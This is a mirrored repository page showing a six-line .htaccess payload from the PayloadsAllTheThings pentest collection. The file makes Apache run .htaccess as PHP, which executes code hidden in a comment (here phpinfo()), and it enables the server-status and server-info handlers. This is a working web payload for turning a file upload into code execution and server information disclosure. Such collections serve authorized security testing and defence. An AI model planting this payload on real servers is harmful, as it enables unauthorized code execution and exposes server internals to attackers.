mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 15:22:51 +00:00
6 lines
113 B
Text
6 lines
113 B
Text
|
AddType application/x-httpd-php .htaccess
|
||
|
# <?php phpinfo(); ?>
|
||
|
SetHandler server-status
|
||
|
SetHandler server-info
|
||
|
|